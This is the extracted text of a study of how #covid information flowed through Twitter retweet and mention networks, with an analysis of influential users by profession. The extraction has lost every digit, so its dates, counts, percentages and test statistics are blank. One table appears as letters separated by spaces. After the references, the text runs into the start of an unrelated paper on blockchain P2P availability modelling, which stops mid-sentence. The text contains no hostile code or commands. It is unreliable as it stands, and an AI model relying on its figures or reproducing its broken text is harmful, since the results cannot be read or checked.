medicine, university of southern california, los angeles, ca. *e-mail: iank@usc.edu abstract coronavirus disease of (covid- )’s devastating effects on the physical and mental health of the public are unlike previous medical crises, in part because of people’s collective access to communication technologies. unfortunately, a clear understanding of the diffusion of health information on social media is lacking, which has a potentially negative impact on the effectiveness of emergency communication. this study applied social network analysis approaches to examine patterns of #covid information flow on twitter. a total of , , publicly available tweets from , u.s. users were retrieved and analyzed. particular attention was paid to the structures of retweet and mention networks and identification of influential users: information sources, disseminators, and brokers. overall, covid- information was not transmitted efficiently. findings pointed to the importance of fostering connections between clusters to promote the diffusion in both networks. lots of localized clusters limited the spread of timely information, causing difficulty in establishing any momentum in shaping urgent public actions. rather than health and communication professionals, there was dominant involvement of non-professional users responsible for major covid- information generation and dissemination, suggesting a lack of credibility and accuracy in the information. inadequate influence of health officials and government agencies in brokering information contributed to concerns about the spread of dis/misinformation to the public. significant differences in the type of influential users existed across roles and across networks. conceptual and practical implications for emergency communication strategies are discussed. keywords covid, information diffusion, health communication, social network analysis, twitter. since the first case of coronavirus disease of (covid- ) was confirmed in the united states on january , , over million people in the u.s. have confirmed cases of covid- . despite multiple national- and state-wide interventions and prevention measures including banning non-essential travel and stay-at-home orders, on april , the usa became the nation with the most deaths globally. as of december , the u.s. death toll surpassed , . providing up-to-date, accurate information, deli- vering key messages timely to the public, and controlling the spread of dis/misinformation can play a crucial role in managing epidemics (homeland security council (us), ; world health organization, ; centers for disease control and prevention, ; department of homeland security, ). covid- ’s devastating effects on the physical and mental health of the public are unlike previous medical crises, covid- twitter network in part because of people’s collective access to communication technologies. covid- is the first pandemic of its kind in the age of social media. the amount and nature of information available to the public has changed significantly and is constantly evolving. unfortunately, a crucial but surprisingly understudied phenomenon is the diffusion of health information on social media (zhou et al., ; aramburu et al., ). twitter, a microblogging service, has become one of the most important sources of realtime news updates, with more than million users in the u.s. (kemp, ). according to a recently published pew research center report, % of american adults get news on social media and % of twitter users responded they use it to get daily news (matsa and shearer, ). twitter users send and receive short posts called tweets about any topic. tweets can be up to characters long and can include user mentions and keywords. users can forward other users’ tweets and these forwarded messages are called retweets. mentions can be used with the at symbol “@” before a username to identify a specific user. by retweeting or mentioning, users are interacting with other users and share information in a conversation-like manner (wang et al., ). the hashtag symbol “#” can be used before a relevant keyword to initiate conversations or contribute to discussions of existing topics by showing their tweets in twitter search. the use of the hashtag on twitter indicates self-association of a user with an issue (gruzd et al., ; gleason, ). as users interact in twitter space, they form connections that emerge into complex social network structures. essentially, the connections are asymmetric, since a user who is retweeted or mentioned by another user does not necessarily have to reciprocate by retweeting or mentioning them back. due to this asymmetry, users can re-create and reinforce traditional hierarchical network structures in twitter by relying on just a few information sources or by choosing to limit interactions to a select group of similar others (himelboim et al., ). thus, the connections built among users are indicators of information sharing and network structures reflect patterns of information flow (himelboim et al., ; majmundar et al., ). there are many studies that have examined the structure of communication networks on twitter that provide insights about information flow during political campaigns and social movements (himelboim et al., ; ansari, ; harris et al., ; kruikemeier, ; shin et al., , ; recuero et al., ). the patterns of communication and influential groups can vary across topics, cultures, or languages. although few recent studies investigated ebola information dissemination patterns (harris et al., ; liang et al., ), their analysis was limited to retweet network, which together with mention network can provide an understanding of information flow on twitter (conover et al., ). to the best of our knowledge, this is the first study to examine both the retweet and mention networks to understand the diffusion of health information on twitter among americans during a pandemic. structural characteristics were examined at the network level to address our overarching research question: is the current twitter’s covid- communication network effectively leveraged to facilitate the flow of valid information during this crisis? information can diffuse most effectively during crises if the network is sufficiently dense with low rates of clustering (himelboim et al., ). ideally, the twitter covid- communication network would have large audience and spread information quickly. thus, we evaluated information flow in the retweet and mention networks with particular attention paid to its connectivity, modularity and direction of information flow. influential covid- twitter users were identified as information sources, disseminators and brokers. ideally, covid- information sources would be medical/health professionals to emphasize credibility, disseminators would be communication/journalism professionals to maximize reach, and brokers would be public health and government officials to ensure that information is accurate and continues to flow (world health organization, ; centers for disease control and prevention, ). thus, the aim of this study was to determine the characteristics of covid- twitter users by comparing the pro- fessional categorizations by their roles as sources, disseminators, or brokers in the retweet and mention networks. we hope this study will significantly contribute to public health by helping devise more effective emergency communication strategies and ultimately help mitigate the spread of disease and reduce misinformation. methods data we retrieved all publicly available tweets and user information from april , , : : am, to april , , : : am, gmt (utc + ), using the twitter api with the query “contains: #covid and country code: usa and language: english.” this time period was chosen because the u.s. became the nation with the highest number of deaths due to connections covid- on april and it was predicted the highest u.s. daily death rate would occur on april . we selected am (instead of midnight) as the temporal boundary between days because the number of tweets started increasing around am and reached its peak around pm each day. figure shows the distribution of the tweets that used #covid during the study period. the twitter users’ usernames, tweets, hashtags, retweet and mention relationships and self-descriptions were collected. we did not include replies to reduce the likelihood of repetition, losing context information, or producing unreliable data caused by twitter’s new feature, “hide reply.” construction of retweet and mention networks the data were converted into social network format using the r package “rtweet” (kearney, ). we constructed retweet and mention networks as previously reported (yang and counts, ; harris et al., ; takeichi et al., ; himelboim et al., ). in the retweet network, each node represents a twitter user and a directed edge is attached from user b to user a, if user b retweets a tweet originally posted by user a. the mention network was constructed in the same manner based on @username mentioning. that is, a directed edge is constructed from b to a, if user b mentions user a in his/her tweet. the opposite directions of edges in these networks therefore represent potential pathways for information flow. figure shows (a) how we built the networks and (b) how information is spread in the networks. these two network datasets contained a total of , , directed relationships (ties) from , users (nodes). the r package “igraph” (csardi and nepusz, ) was used to calculate network- level and user-level metrics, to identify overall network structures and influential users and to provide insights for information flow. analyses were conducted on the whole three-day set, separately on retweet and mention networks in order to compare them. the networks were visualized using the library “networkx” (hagberg et al., ) for programming language python. in order to focus on detailed elements and to give a spatial understanding of social relations (i.e., segregation, interaction, and clustering), smaller networks were created using one- hour subsets of the data (martin iii, ; moody et al., ). the time period of april , , : : pm to : : pm, gmt (utc + ), was chosen for the subset to display because it provided a finer representation of network structures than other time periods and it had the largest amount of information for both retweet and mention networks that our lab computers could analyze. the subset network’s structure was representative of the whole network. initial visualizations were attempted on each one-hour subset individually and results were very similar, so the finest representation was included in the current study. the coefficient of variation (cv) was calculated for each of the network measures: cvs for degree centrality= . for the retweet and . for the mention networks across one-hour subsets; cvs for density= . for the retweet and . for the mention figure : volume of #covid tweets from april , , : : am, to april , , : : am, gmt (utc + ), with minutes time intervals. covid- twitter network networks across one-hour subsets, respectively. this indicates the network metric values for the separate one-hour slices are relatively similar. network level understanding the overall structure of a network is key for understanding how information flows among its users (hinds and mcgrath, ; hossain and kuti, ; valente, , ). typical network level metrics are size, average path length, network diameter, rates of reciprocity and transitivity, density, as well as clustering measured as the degree of modularity and the network average clustering coefficient. twitter users often form clusters composed of users who are more interconnected among themselves than others in the network. within clusters, information tends to flow fast, while across clusters information flow is often restricted by limited connectivity available across clusters. we identified clusters using the clauset–newman–moore algorithm to define the boundaries of information flow (clauset et al., ). modularity of each network was computed to measure the interconnectedness of figure : toy networks: (a) retweet and mention networks; (b) information diffusion network; (c) influential user identification in the retweet and mention networks. connections clusters using the girvan–newman algorithm (girvan and newman, ). higher scores indicated that the clusters are more distinct or separated from one another (range =clusters completely overlap to =no connections between clusters). while modularity captures the extent to which clusters are distinct from one another, it is often unable to detect small clusters (fortunato and barthelemy, ; kaalia and rajapakse, ). to investigate the network in more depth, density between clusters was calculated as the sum of existing ties between two clusters divided by total possible number of ties between them (range =no connection to =complete connection). user level in-degree, out-degree, and betweenness centrality metrics were used to identify influential users (freeman, ; valente, ). although there is no fixed ratio or standard approach to identify the number of influential users in a given network, top users with highest centrality scores or more has been considered enough to provide an indication of major direction of information flow in previous studies (anger and kittl, ; himelboim et al., ; recuero et al., ; giglou et al., ). given the large size of our data, this study identified a total of influential users from the retweet and mention networks. on twitter, retweets and mentions are sent from one user to another. the predominant direction of such connections determines the information flow. in-degree centrality measures the number of times a user received retweets or mentions and those with high in-degree indicate the user is a major source of information for others (yang and counts, ; morris et al., ; littau and jahng, ). thus, we identified users who had the top in-degree scores in each network as information sources. out- degree centrality measures the number of outgoing connections a user has. if a user frequently retweets or mentions other users, the user will have high out- degree, and high out-degree will indicate the user is an initiator of large proportions of ties. thus, we identified users who had the top out-degree centrality scores in each network as information disseminators. betweenness centrality measures the frequency a user lies on the shortest path between other users (freeman, , ). a user with high betweenness has more information passing through them and a higher number of other people depend on that user to get information, and without that user, groups of people will be much less connected. thus, we can use this metric to find users who are communication controllers in a given network. we identified users who had the top betweenness centrality scores in each network as information brokers. we assume that all of the connections in these networks can diffuse information equally and so centrality measures were not weighted. during public health emergencies, health professionals have an important role to ensure the quality of shared information; likewise, the roles of communication professionals to timely disseminate the information with clear directions and of government officials to manage and maintain information flow are crucial in mitigating the effects of a pandemic (world health organization, ; centers for disease control and prevention, ). interaction and cooperation between health professionals, communication professionals, and the government are critical during a pandemic (world health organization, ; centers for disease control and prevention, ). after identifying the information sources, disseminators and brokers, a conceptual assessment was conducted to under stand the nature of influential users in the retweet and mention networks. regarding the nature of users, we classified the users into four types, based on their self-descriptions. healthcare providers and researchers/scientists were classified as health professionals. people who disseminate news and information to serve the public interest such as media broadcasters, journalists, and reporters were classified as communication professionals. politicians, policy makers, and national agencies were classified as government officials. public figures and all other ordinary individuals who are simply using twitter to share personal views were classified as non- professionals. the user type classification results were compared across roles and across networks using fisher’s exact test. results network level the retweet network had , ties from , users, whereas the mention network had , ties from , users. overall, covid- information was not transmitted efficiently. in both networks, information flowed in one direction; the flow was slow; both retweet and mention networks were sparse and consisted of many small clusters; the clusters were disconnected from each other; and shared information was less likely to reach the entire group. both networks exhibited quite similar structure. table summarizes metrics from the network level analyses. in both retweet and mention networks, low levels of mutuality of connections among users indicated covid- twitter network the information flow is unidirectional: retweet network, reciprocity= . % and transitivity= . %; and mention network, reciprocity = . % and transitivity = . %. both networks exhibited long average path lengths, implying information may diffuse slowly and less evenly: on average, users were separated by others in the retweet network and others in the mention network. both networks were divided into a large number of clusters: , clusters in retweet network and , clusters in mention network. information was not likely to be shared between clusters: average clustering coefficients calculated for each network were . in retweet network and . in mention network. users had dense connections with other users within clusters but sparse connections between users in different clusters: although it was slightly lower in retweet network, both networks revealed high modularity with scores of . in retweet network and . in mention network. both retweet and mention networks showed very low density: density scores were . in retweet network and . in mention network. user level degree analyses revealed that a very small number of users determined the major covid- information flow in both retweet and mention networks. the degree distributions in both networks tended to be scale-free, suggesting a hierarchical structure. the in-degree values of all users in the retweet network ranged between and , (n= , , m= . , med= ), the out-degree values between and (n= , , m= . , med= ), and the betweenness values between and , , (n= , , m= , . , med= ). in the mention network, the in-degree values of all users ranged between and , (n= , , m= . , med= ), the out-degree values between and (n= , , m= . , med= ), and the betweenness values between and , , (n= , , m= , . , med= ). all degree distributions were highly right-skewed: retweet network, skewness and kurtosis scores were . and , . for in-degree, . and . for out-degree, and . and , . for betweenness; mention network, . and , . for in-degree, . and . for out-degree, and . and , . for betweenness. the in-degree of the identified information sources (top ) in the retweet network was between and , (n= , m= , , med= , ), the out- degree of the identified information disseminators was between and (n= , m= , med= ), and the betweenness of the identified information brokers was between , , and , , (n= , m= , , , med= , , ). in the men- tion network, the in-degree of the identified infor- mation sources was between and , (n= , m= , , med= , ), the out-degree of the identified information disseminators was between and (n= , m= , med= ), and the betweenness of the identified information brokers was between , , and , , (n= , m= , , , med= , , ). table compares the summary statistics of the degree distribution of influential users and of all users. both networks followed a power-law degree distribution, providing evidence of scale-free, hierarchical structures: in-degree α= . , r = . , p< . and out-degree α= . , r = . , p< . were calculated in the retweet network; in-degree α= . , r = . , p< . and out-degree α= . , r = . , p< . were calculated in the mention network. figure shows the scale-free in-and out- degree distributions on a log–log scale with the raw score distributions on a histogram. the user type classification results revealed that, in both networks, the major covid- information being shared among twitter users was primarily authored by non-professionals and government officials; the information was primarily disseminated table . network metrics for the retweet and mention networks. network retweet mention number of nodes , , number of edges (directed) , , diameter (largest connected component) average path length . . reciprocity . . transitivity . . number of clusters , , average clustering coefficient . . modularity . . density < . < . connections by non-professionals; and health professionals played a major role in brokering information. the classified types of influential users in different roles in each network were all statistically significantly different from one another (all ps< . ). significant difference across networks was observed in the composition of the identified information brokers at α= . : brokers in the retweet network were most frequently healthcare providers and ordinary citizens, with a near absence of government officials whereas brokers in the mention network were most often research scientists followed by healthcare workers. table summarizes the results of user level analyses. table shows the p-values obtained from user type composition comparison across roles and across networks using fisher’s exact test. retweet network information sources, the top on in-degree, were almost evenly divided among the four user types: health professionals, %; communication professionals, %; government officials, %; and non-professionals, %. in contrast, information disseminators, the top on out-degree, were predominately non-professionals, % (with % of them being ordinary people); and a handful of communication professionals, %. information table . centrality statistics for influential and all other users in both networks. retweet mention influential users all users influential users all users in-degree n= n= , n= n= , mean , . , . sd , . , . median , , min. max. , , , , skewness . . kurtosis , . , . out-degree n= n= , n= n= , mean . . sd . . median min. max. skewness . . kurtosis . . betweenness n= n= , n= n= , mean , , , . , , , . sd , , , . , , , , median , , , , min. , , , , max. , , , , , , , , skewness . . kurtosis , . , . covid- twitter network brokers, the top on betweenness, were predominately health professionals, % (with most being healthcare providers, %); and non- professionals being most of the remainder, %. mention network the mention network followed a similar pattern with information sources being almost evenly divided among the four user types: health professionals, %; communication professionals, %; government officials, %; and non-professionals, %. infor- mation disseminators, as in the retweet network, were predominately non-professionals, % (with % of them being ordinary people); and a handful of communication professionals, %. information brokers were predominately health professionals, %, although in this case these health professionals were more likely to be researchers/scientists ( %); and government ( %) and communication professionals ( %) primarily the remainder. visualization the one-hour subset data for the retweet network visualization consisted of , ties from , users. the subset data for the mention network visualization consisted of , ties from , users. figure visually depicts the structures and information flow of retweet network and mention network. the size and color of the nodes were made proportional to the unweighted in-degree centrality score of each user. the ties between users represented the information exchange links between the users. directions of ties were ignored. attention was focused on the overall degree distribution and connectivity between high degree users (information sources) and lower degree users to help reveal the overall network structure and information flow. spatialization was used to draw nodes with more ties to more central positions. in both networks, a hierarchical structure was apparent and information flow was concentrated figure : scale free in-degree and out-degree distributions on a log-log scale for retweet and mention networks. note: users with a degree score > are not shown in histograms. connections t a b le . o c c u p a ti o n s o f in fl u e n ti a l u se rs in r e tw e e t a n d m e n ti o n n e tw o rk s. in fo rm a ti o n s o u rc e s (n = ) in fo rm a ti o n d is se m in a to rs ( n = ) in fo rm a ti o n b ro k e rs ( n = ) r et w ee t h ea lth c ar e p ro vi d er s ( . % ) c ar e p ro vi d er s ( . % ) c ar e p ro vi d er s ( . % ) p ro fe ss io n al s r es ea rc h er s/ s ci en tis ts ( . % ) r es ea rc h er s/ s ci en tis ts ( . % ) r es ea rc h er s/ s ci en tis ts ( . % ) c o m m u n ic at io n m ed ia b ro ad ca st er s ( . % ) m ed ia b ro ad ca st er s ( . % ) m ed ia b ro ad ca st er s ( . % ) p ro fe ss io n al s jo u rn al is ts /r ep o rt er s ( . % ) jo u rn al is ts /r ep o rt er s ( . % ) jo u rn al is ts /r ep o rt er s ( . % ) g o ve rn m en t p o lit ic ia n s/ p o lic y m ak er s ( . % ) p o lit ic ia n s/ p o lic y m ak er s ( . % ) p o lit ic ia n s/ p o lic y m ak er s ( . % ) o ffi ci al n at io n al a g en ci es ( . % ) n at io n al a g en ci es ( . % ) n at io n al a g en ci es ( . % ) n o n -p ro fe ss io n al s p u b lic f ig u re s ( . % ) p u b lic f ig u re s ( . % ) p u b lic f ig u re s ( . % ) o rd in ar y in d iv id u al s ( . % ) o rd in ar y in d iv id u al s ( . % ) o rd in ar y in d iv id u al s ( . % ) m en tio n h ea lth c ar e p ro vi d er s ( . % ) c ar e p ro vi d er s ( . % ) c ar e p ro vi d er s ( . % ) p ro fe ss io n al s r es ea rc h er s/ s ci en tis ts ( . % ) r es ea rc h er s/ s ci en tis ts ( . % ) r es ea rc h er s/ s ci en tis ts ( . % ) c o m m u n ic at io n m ed ia b ro ad ca st er s ( . % ) m ed ia b ro ad ca st er s ( . % ) m ed ia b ro ad ca st er s ( . % ) p ro fe ss io n al s jo u rn al is ts /r ep o rt er s ( . % ) jo u rn al is ts /r ep o rt er s ( . % ) jo u rn al is ts /r ep o rt er s ( . % ) g o ve rn m en t p o lit ic ia n s/ p o lic y m ak er s ( . % ) p o lit ic ia n s/ p o lic y m ak er s ( . % ) p o lit ic ia n s/ p o lic y m ak er s ( . % ) o ffi ci al n at io n al a g en ci es ( . % ) n at io n al a g en ci es ( . % ) n at io n al a g en ci es ( . % ) n o n -p ro fe ss io n al s p u b lic f ig u re s ( . % ) p u b lic f ig u re s ( . % ) p u b lic f ig u re s ( . % ) o rd in ar y in d iv id u al s ( . % ) o rd in ar y in d iv id u al s ( . % ) o rd in ar y in d iv id u al s ( . % ) covid- twitter network at the center where influential users are located. a significant portion of users in both networks were connected to only a few others, whereas a few users had a huge proportion of connections. both networks exhibited a large core cluster, comprised of a small number of high degree users – represented by bigger and brighter nodes in the figure – surrounded by a large number of less influential users and small clusters. in both networks, information brokers played a central role in information diffusion; connections between more influential users and less influential users were mediated by others or clusters. in the retweet network, dense interconnections among influential users, connecting each of their clusters with another, were observed. implications despite twitter’s reputation as an effective medium to connect people and facilitate public communication, the topic of covid- did not bring its users together. both the retweet and mention networks were sparsely connected, exhibiting a large number of small distinct clusters. a study from kaur and singh ( ) reported that disconnected networks often result from distrust in information sources. consistent with their finding, more than half of the covid- information was generated by non-professional users, increasing the likelihood of encountering false information and thereby potentially spreading misinformation. moreover, dominant involvement of non- professional users was observed in the information dissemination process. in both the retweet and mention networks, communication professionals were only marginally involved and there were almost no health professionals among the disseminators. since publicly shared information has a direct impact on the development of public behaviors, it is very important to consider the type of people who act as information disseminators during medical crises (hilton and hunt, ; staniland and smith, ). findings by keshvari et al. ( ) warned about biased and misleading content that ordinary people, who are not trained to objectively perceive risks and benefits, disseminate with personal speculations and interpretations during epidemics. communication professionals, on the other hand, are trained to investigate all possible aspects and implications of information before promoting the information. in this process, communication professionals are often dependent on health professionals to substantiate facts and provide balance by ensuring pluralistic aspects and implications of the pandemic (ahlmén- laiho et al., ). increasing willingness on the part of communication professionals to disseminate accurate information and to cooperate with health professionals, may be critical to control the spread of dis/misinformation and prevent public confusion. in both the retweet and mention networks, information flow was highly concentrated within a core cluster, comprised of a few influential users and their own clusters; information flow to the rest of the network (the other clusters) was severely restricted due to the limited connectivity. this suggests that the networks facilitate the diffusion of covid- information if brokers integrate with their communities and clusters. in the context of social media communications, the limited connectivity between clusters means that networks would break into isolated components, separated by redundant and unnecessary information and that information will, more often than not, be trapped within its own cluster. brokers, on the other hand, create paths for information diffusion and make global information table . p-values from fisher’s exact test comparing occupations across user roles and between networks. retweet mention retweet vs. mention . information sources < . < . < . < . . . information disseminators < . < . . . information brokers . connections flow easier to attain, if and when they are activated (gonzález-bailón and wang, ). in a pandemic, a balanced approach to centralized control and management of information is critical in helping public audiences understand the threat and what actions should be taken (homeland security council (us), ; department of homeland security, ). a proper course of action as information brokers must be taken by government officials to be complete, valid and reliable (homeland security council (us), ; department of homeland security, ). un- fortunately, however, that was not happening in the current twitter’s covid- communication network. neither the retweet network nor the mention network showed enough influence of government officials as information brokers; in both networks, information flow was primarily maintained by health professionals. developing social media communication guidelines for officials and national agencies that offer a starting point to foster connections and training to control or promote information flow may help ensure effective information flow and make necessary information timely and accessible to those who need it in the process of emergency response. both the retweet and mention networks exhibited a scale-free hierarchical structure, with unidirectional information flow. due to preferential attachment a small number of influential users get, such network structures can be much more effective at rapid information diffusion for timely response and national solidarity during crises (himelboim et al., ; de brún and mcauliffe, ); because a small number of influential users can command a large and disproportionate number of other users and those users then will affect all the other users in their local network, a whole subsystem can be covered in just a few steps, making it relatively easier to keep everyone informed of relevant information such as risks and action items. at the same time, however, such network structures can also be vulnerable to false information and its diffusion can be easily distorted by just one or a few influential users’ absence in the network (lossio-ventura and alatrista-salas, ; de brún and mcauliffe, ); for instance, if one or two figure : graphs of the #covid retweet and mention networks (april , , – pm, gmt (utc + )). covid- twitter network influential users were removed or left the network, it would leave a major gap in support for most users thus interrupting information flow; similarly, a single piece of misinformation can be a risk factor for the entire system because of the fast nature of information dissemination. monitoring information flow and ensuring that the public can rely on a consistently valid source of information via controlled channels at all stages of a pandemic communication planning may help the emergency communication network be more resilient and stable. the visualization results suggested that influential users in the retweet and mention networks may have different reasons to engage in covid- communication. different interaction patterns and preferences in interaction form in twitter networks have been previously shown to result in part from differences in the type of messages, which may reflect the reasons users engage in the communication (conover et al., ; himelboim et al., ). conover et al. ( ) found that, in twitter’s political discourse where the retweet network was highly polarized while the mention network was not, users tended to retweet other users whom they agreed with politically, while they interacted with users whom they disagreed with more frequently using mentions to argue or share their views. covid- ’s retweet and mention networks did not exhibit the same connectivity among users. interacting closely, influential users in the retweet network shared information with each other, and the interactions among influential users facilitated less influential users’ access to information by connecting each of their clusters in the network. in contrast, the absence of interactions among influential users in the mention network led to the more limited information flow across clusters. studies are needed to investigate whether and how differences in information flow tendencies in health communication represent differences as a function of information type. limitations this study has some noteworthy limitations. data collection was restricted to english messages, which may limit generalizability to other languages. the study was unable to access private networks – only publicly available tweets were retrieved for the analyses. although a majority of twitter users ( %) reported they keep their accounts public (wojcik and hughes, ), the findings may not reflect the characteristics and attitudes of private users. many additional aspects of information diffusion regarding the topic of covid- were not captured by the indicators of information sharing – retweets and mentions. for example, the current study did not include followers-followees structure since it has been reported that influential users are those who have an active audience who mentions or retweets the users, instead of the large number of followers (cha et al., ) and the number of followers/ followees does not fully explain users’ actual activities (hamzehei et al., ); however, it may be possible that the structure explains other aspects such as the impact of the information shared. the current version of the twitter api does not store users who retweet retweeters. a prior study on information spread on the retweet network connection identified that most ( %) of retweets are directly retweeted from the initial message (liang et al., ). however, the unavailability of the full content record may prevent us from further knowing the pattern of information diffusion among intermediate retweeters. there are no comparable analyses to determine cut-off values of network indices to be high or low. thus, our only basis was our own interpretation of the data. social networks are often only weakly scale-free even in cases where the power-law distribution is observed (broido and clauset, ). future research should investigate the robustness of the scale-free structures and interpretability of power-law distribution. drawing inferences solely based on a visual inspection requires further statistical confirmation. conclusion this study examined the covid- communication network on twitter to provide insights about health information flow among americans during a pandemic. structural characteristics of retweet and mention networks were quantified and described with different metrics (size, density, connectivity, modularity). influential users (information sources, disseminators, brokers) in each network were identified and the nature of the influential users were conceptually assessed. results showed that in both retweet and mention networks, the topic of covid- created large fragmented twitter populations into multiple communication channels, each with its own audience and information sources. the study also found the absence of reliable sources, disseminators that can provide timely, accurate information, and proper management of information flow. these results have implications for understanding and predicting information diffusion in urgent public health communication. overall, the findings emphasized the importance of connecting users to the essential resources and distinguishing credible information among a huge amount of information being shared. as social media becomes a more connections heavily used news source, the effectiveness of crisis management depends more on the type of information shared among its users and the user reachability in the network. our work opens several new questions about the underlying structures of social media communication network. future studies may expand this research, exploring how user clusters are formed and examining how relationships between information type and degree of influence differ by cluster or change over time. references ahlmén-laiho, u., suominen, s., järvi, u. and tuominen, r. . “finnish health journalists’ perceptions of collaborating with medical professionals”, international conference on well-being in the information society, springer, cham, pp. – . anger, i. and kittl, c. . “measuring influence on twitter”, proceedings of the th international conference on knowledge management and knowledge technologies, pp. – . ansari, a. . “green’s art: new media aesthetics in pre-and post-election events in iran”, proceedings of the th international symposium of electronic art edited by k. cleland, l. fisher, and r. harley, isea international, the australian network for art & technology, and the university of sydney, sydney. aramburu, m. j., berlanga, r. and lanza, i. . social media multidimensional analysis for intelligent health surveillance. international journal of environmental research and public health : . broido, a. d. and clauset, a. . scale-free networks are rare. nature communications : – . centers for disease control and prevention. . crisis and emergency risk communication (cerc) manual, centers for disease control and prevention, atlanta, available at: https://emergency.cdc.gov/cerc/ manual/index.asp. cha, m., haddadi, h., benevenuto, f. and gummadi, p. k. . measuring user influence in twitter: the million follower fallacy. icwsm, : . clauset, a., newman, m. e. and moore, c. . finding community structure in very large networks. physical review e : , doi: . / physreve. . . conover, m. d., ratkiewicz, j., francisco, m., gonçalves, b., menczer, f. and flammini, a. . political polarization on twitter. fifth international aaai conference on weblogs and social media. csardi, g. and nepusz, t. . the igraph software package for complex network research. interjournal complex systems : – . de brún, a. and mcauliffe, e. . social network analysis as a methodological approach to explore health systems: a case study exploring support among senior managers/executives in a hospital network. international journal of environmental research and public health : . department of homeland security . countering false information on social media in disasters and emergencies: social media working group for emergency services and disaster management. fortunato, s. and barthelemy, m. . resolution limit in community detection. proceedings of the national academy of sciences : – , available at: https://doi.org/ . /pnas. . freeman, l. c. . a set of measures of centrality based on betweenness. sociometry : – , available at: https://doi.org/ . / . freeman, l. c. . centrality in social networks: conceptual clarification. social networks : – . giglou, r. i., d’haenens, l. and van gorp, b. . “identifying influential users in twitter networks of the turkish diaspora in belgium, the netherlands, and germany”, handbook of research on politics in the computer age, igi global, pp. – . girvan, m. and newman, m. e. . community structure in social and biological networks. proceedings of the national academy of sciences : – . gleason, b. . #occupy wall street: exploring informal learning about a social movement on twitter. american behavioral scientist : – . gonzález-bailón, s. and wang, n. . networked discontent: the anatomy of protest campaigns in social media. social networks : – . gruzd, a., wellman, b. and takhteyev, y. . imagining twitter as an imagined community. american behavioral scientist : – . hagberg, a., swart, p. and s chult, d. . exploring network structure, dynamics, and function using networkx(no. la-ur- - ; la-ur- - ) los alamos national lab. (lanl), los alamos, nm. hamzehei, a., jiang, s., koutra, d., wong, r. and chen, f. . topic-based social influence measure- ment for social networks. australasian journal of infor- mation systems : . harris, j. k., duncan, a., men, v., shevick, n., krauss, m. j. and cavazos-rehg, p. a. . peer reviewed: messengers and messages for tweets that used #thin- spo and #fitspo hashtags in . preventing chronic disease , e , doi: . /pcd . . harris, j. k., moreland-russell, s., choucair, b., mansour, r., staub, m. and simmons, k. . tweeting for and against public health policy: response to the chicago department of public health’s electronic cigarette twitter campaign. journal of medical internet research : e . hilton, s. and hunt, k. . uk newspapers’ representations of the – outbreak of swine flu: one health scare not over-hyped by the media?. journal of epidemiology and community health : – . covid- twitter network himelboim, i., lariscy, r. w., tinkham, s. f. and sweetser, k. d. . social media and online political communication: the role of interpersonal informational trust and openness. journal of broadcasting & electronic media : – . himelboim, i., smith, m. a., rainie, l., shneiderman, b. and espina, c. . classifying twitter topic- networks using social network analysis. social media+ society . hinds, p. and mcgrath, c. . structures that work: social structure, work structure and coordination ease in geographically distributed teams. proceedings of the th anniversary conference on computer supported cooperative work, pp. – . homeland security council (us) . national strategy for pandemic influenza: implementation plan. executive office of the president. hossain, l. and kuti, m. . disaster response preparedness coordination through social networks. disasters : – . kaalia, r. and rajapakse, j. c. . refining modules to determine functionally significant clusters in molecular networks. bmc genomics : . kaur, m. and singh, s. . analyzing negative ties in social networks: a survey. egyptian informatics journal : – . kearney, m. w. . rtweet: collecting and analyzing twitter data. journal of open source software : . kemp, s. . digital : april global statshot, available at: https://datareportal.com/reports/digital- -april-global-statshot (accessed may , ). keshvari, m., yamani, n., adibi, p. and shahnazi, h. . health journalism: health reporting status and challenges. iranian journal of nursing and midwifery research : . kruikemeier, s. . how political candidates use twitter and the impact on votes. computers in human behavior : – . liang, h., fung, i. c. h., tse, z. t. h., yin, j., chan, c. h., pechta, l. e. and fu, k. w. . how did ebola information spread on twitter: broadcasting or viral spreading?. bmc public health : . littau, j. and jahng, m. r. . interactivity, social presence, and journalistic use of twitter. # isoj journal : – . lossio-ventura, j. a. and alatrista-salas, h. (eds), . information management and big data: second annual international symposium, simbig , cusco, peru, september - , , and third annual international symposium, simbig , cusco, peru, september - , , revised selected papers (vol. ), springer. majmundar, a., allem, j. p., cruz, t. b. and unger, j. b. . the why we retweet scale. plos one : e , available at: https://doi.org/ . /journal. pone. . martin, j. g. iii . visualizing the invisible: application of knowledge domain visualization to the longstanding problem of disciplinary and professional conceptualization in emergency and disaster manage- ment. universal-publishers, charles town, ma. matsa, k. e. and shearer, e. . news use across social media platforms . pew research center. moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology : – . morris, m. r., counts, s., roseway, a., hoff, a. and schwarz, j. . tweeting is believing? understanding microblog credibility perceptions. proceedings of the acm conference on computer supported cooperative work, pp. – . recuero, r., zago, g. and soares, f. . using social network analysis and social capital to identify user roles on polarized political conversations on twitter. social media+ society : . shin, j., jian, l., driscoll, k. and bar, f. . political rumoring on twitter during the us presidential election: rumor diffusion and correction. new media & society : – . shin, j., jian, l., driscoll, k. and bar, f. . the diffusion of misinformation on social media: temporal pattern, message, and source. computers in human behavior : – . staniland, k. and smith, g. . flu frames. sociology of health & illness : – . takeichi, y., sasahara, k., suzuki, r. and arita, t. . concurrent bursty behavior of social sensors in sporting events. plos one : e . valente, t. w. . network models of the diffusion of innovations, hampton press, cresskill, nj. valente, t. w. . social networks and health: models, methods, and applications, oxford university press. wang, j., cellary, w., wang, d., wang, h., chen, s. c., li, t. and zhang, y. (eds), . web information systems engineering–wise : th international conference, miami, fl, usa, november – , , proceedings (vol. ), springer. wojcik, s. and hughes, a. . sizing up twitter users pew research center, washington, dc. world health organization. . pandemic influenza preparedness and response: a who guidance document, world health organization, geneva. yang, j. and counts, s. . predicting the speed, scale, and range of information diffusion in twitter. th international aaai conference on weblogs and social media (icwsm), : – . zhou, l., zhang, d., yang, c. c. and wang, y. . harnessing social media for health information management. electronic commerce research and applications : – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on blockchain availability modeling in p p network wang zan school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .com fu yanfang school of computer science and engineering xi’an technological university xi’an, china e-mail: fuyanfang @aliyun.com zhong lianjiong school of computer science and engineering xi’an technological university xi’an, china e-mail: zhongli @sina.com dai fei school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—blockchain establishes reliable trust among parties that do not know each other and achieves credible data sharing and point-to-point value transmission in an epoch-making way. the requirement of the availability of block chain network becomes more and more important due to the dynamic and changeable characteristics of block chain p p network. therefore, for the characteristics of block chain p p network system, this paper constructs a availability model based on markov stochastic process theory, analyzes the steady-state availability and instantaneous 